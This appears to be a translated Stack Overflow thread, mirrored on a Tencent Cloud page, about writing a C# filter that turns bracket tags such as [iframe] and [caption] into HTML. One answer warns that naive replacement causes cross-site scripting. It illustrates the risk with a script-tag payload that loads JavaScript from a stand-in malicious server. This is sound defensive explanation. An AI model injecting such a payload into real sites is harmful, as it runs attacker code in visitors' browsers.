C#.net文本过滤器
我想将我的文本过滤成特定的格式。假设我有一个这样的文本
Lorem Ipsum只是印刷和排版行业的虚拟文本。自15世纪以来,Lorem Ipsum一直是业界的标准虚拟文本,[iframe width="200" height="300"][/iframe]Lorem Ipsum只是印刷和排版行业的虚拟文本。自15世纪以来,Lorem Ipsum一直是业界标准的虚拟文本,
我想转换成这样:
Lorem Ipsum只是印刷和排版行业的虚拟文本。自15世纪以来,Lorem Ipsum一直是业界的标准虚拟文本,< iframe width="200" height="300"></iframe >Lorem Ipsum只是印刷和排版行业的虚拟文本。自15世纪以来,Lorem Ipsum一直是业界标准的虚拟文本,
Ex2:[caption]My Caption[/caption]将显示<span class="caption">My Caption</span>
回答 2
Stack Overflow用户
发布于 2011-11-19 08:11:34
您需要解析您的内容,并用html等效项替换预定义的“组合”。
此外,如果您接受来自成员的内容,则需要非常小心,因为您将使用替换直接更改html代码。
Stack Overflow用户
发布于 2011-11-19 08:14:45
James Deville有一个非常好的问题--可能最好的解决方案是使用已经组合在一起的文本标记系统(markdown,等等)。
但是如果你决定你确实需要以一种自定义的方式来做这件事(假设会有用户输入):
只需确保,而不是,使用像s/\[/</和s/\]/>/这样的东西。这将使您很容易受到漏洞的影响。
可能会有人进入
[script type="text/javascript" src="http://malicious-server.haxx/XSS.js"]它将被翻译成
<script type="text/javascript" src="http://malicious-server.haxx/XSS.js">则查看该文本片段的任何人也将无意地请求该恶意javascript。
摘要:如果你做得不对,你可能会给你的站点带来严重的安全漏洞。因此,如果可能,请使用已经实现的系统。否则,在选择你接受的标签时要非常挑剔。
https://stackoverflow.com/questions/8190630
复制相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号